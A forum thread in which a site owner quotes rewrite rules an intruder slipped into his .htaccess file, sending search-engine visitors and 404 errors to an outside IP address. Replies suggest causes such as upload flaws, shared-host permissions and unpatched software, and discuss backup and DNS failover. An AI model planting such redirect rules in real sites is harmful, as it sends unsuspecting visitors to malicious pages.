.htaccess Edited... but not by me!

Ye' old general discussion board. Basically, for everything that isn't covered elsewhere. Come here to shoot the breeze, shoot your mouth off, or whatever suits your fancy.
This forum is not for asking programming related questions.

Moderator: General Moderators

Post Reply
User avatar
Chalks
Forum Contributor
Posts: 447
Joined: Thu Jul 12, 2007 7:55 am
Location: Indiana

.htaccess Edited... but not by me!

Post by Chalks »

Ok guys, I'd love to hear thoughts on this one. I had a very strange thing happen to me today. I found out that my .htaccess file had been edited by _someone_ to have this in it:

Code: Select all

RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]
RewriteRule .* http://87.248.180.88/in.html?s=hg [R,L]
Errordocument 404 http://87.248.180.88/in.html?s=hg_err
I'm not entirely sure what all of that means. However, I now know that all my 404s were getting redirected to 87.248.180.88 (which seems to be spam/virus-ey). I discovered this by almost pure chance. I've alerted my hosting provider, have changed all my passwords, and removed all the code that I could find. However, I'm _very_ curious as to how this got into my .htaccess file.

I would be _very_ surprised if someone had guessed my password since it's rather strong (8+ characters, capitalization thrown in and numbers/special chars).
I'm pretty sure that none of the php scripts on my server have access to this file, but I could be wrong (?).
Any ideas?
psychotomus
Forum Contributor
Posts: 487
Joined: Fri Jul 11, 2003 1:59 am

Re: .htaccess Edited... but not by me!

Post by psychotomus »

if any of your forms allow uploading. need to check that they can only upload certain file types. I forgot to do this on one of my sites and that uploaded a .js file and ereased over 200gb of data from my server. it took about 2 weeks to reupload it all.
User avatar
Chris Corbyn
Breakbeat Nuttzer
Posts: 13098
Joined: Wed Mar 24, 2004 7:57 am
Location: Melbourne, Australia

Re: .htaccess Edited... but not by me!

Post by Chris Corbyn »

Are you on a shared host? It's possible that all users run PHP under the same userid which is a big security risk.
User avatar
volomike
Forum Regular
Posts: 633
Joined: Wed Jan 16, 2008 9:04 am
Location: Myrtle Beach, South Carolina, USA

Re: .htaccess Edited... but not by me!

Post by volomike »

Check to see if something you did in your shared hosting control panel (if you used shared hosting) did this to you. If not, then you need to go to your web hosting provider to ask if they have an answer. If they don't have an answer, then yeah, you might have been hacked. They don't need to know your password -- there are exploits in certain packages and certain versions of Apache 1.5 and 2. You have to ensure your stuff is patched and up to date. Usually that's the job of your web hosting provider. So, for instance, if I were hacked on a shared host, I'd ensure I had good backups, find the one that worked, complain to my web hosting provider to keep the systems secure, and once everything was good again, I'd reupload my stuff from backup.

If it's mission critical, some people go this route. They use a separate DNS system like moniker.com to purchase their domains and host the DNS record for them. Then, they point them to a web hosting provider. They then get a completely separate but compatible web hosting provider that can also rehost their stuff and leave that out there for the time being. In the event of something like this, they just go to moniker.com and repoint their domain to the backup web host in order to have their stuff come back online quickly. In the meantime, the site owner (you) would then split up all the sites s/he owns across these two web hosts. When one starts to have trouble, they can move some or all the domains to the other.
User avatar
VladSun
DevNet Master
Posts: 4313
Joined: Wed Jun 27, 2007 9:44 am
Location: Sofia, Bulgaria

Re: .htaccess Edited... but not by me!

Post by VladSun »

volomike wrote:They use a separate DNS system like moniker.com to purchase their domains and host the DNS record for them. Then, they point them to a web hosting provider. They then get a completely separate but compatible web hosting provider that can also rehost their stuff and leave that out there for the time being. In the event of something like this, they just go to moniker.com and repoint their domain to the backup web host in order to have their stuff come back online quickly.
It's true only if the TTL for DNS records is set to a very low value (e.g. 1hour), which is really rarely seen in DNS registrators.
The TTL is usually set to 86400 - 1 day.

Also, most of the sites use a DB server - it should be synchronized with the "new" one.
There are 10 types of people in this world, those who understand binary and those who don't
User avatar
panic!
Forum Regular
Posts: 516
Joined: Mon Jul 31, 2006 7:59 am
Location: Brighton, UK

Re: .htaccess Edited... but not by me!

Post by panic! »

manialix wrote:Yes 100% agreed with Chris Corbyn Its big Security Risk.
I like how you signed up just to agree with someone haha. :)
Post Reply